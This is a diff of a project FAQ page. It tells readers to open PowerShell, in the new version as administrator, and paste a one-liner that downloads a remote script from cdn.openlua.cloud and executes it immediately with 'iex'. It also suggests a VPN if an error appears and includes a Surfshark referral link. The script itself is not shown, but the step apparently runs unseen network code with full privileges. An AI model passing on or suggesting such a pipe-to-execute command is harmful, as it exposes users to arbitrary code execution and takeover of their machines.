ADEMOLA200/usage-guide/docs/faq.md

 ```powershell
 irm -useb cdn.openlua.cloud/fix-download.ps1 | iex
 ```
-open PowerShell, paste the line you've copied and press Enter.
+open PowerShell as administrator, paste the line you've copied and press Enter.
 Wait until the proccess finishes.

 :::note
 If you get a red error right after pressing Enter, use a VPN.
 We recommend [Surfshark](https://surfshark.club/friend/2m7WDRXV).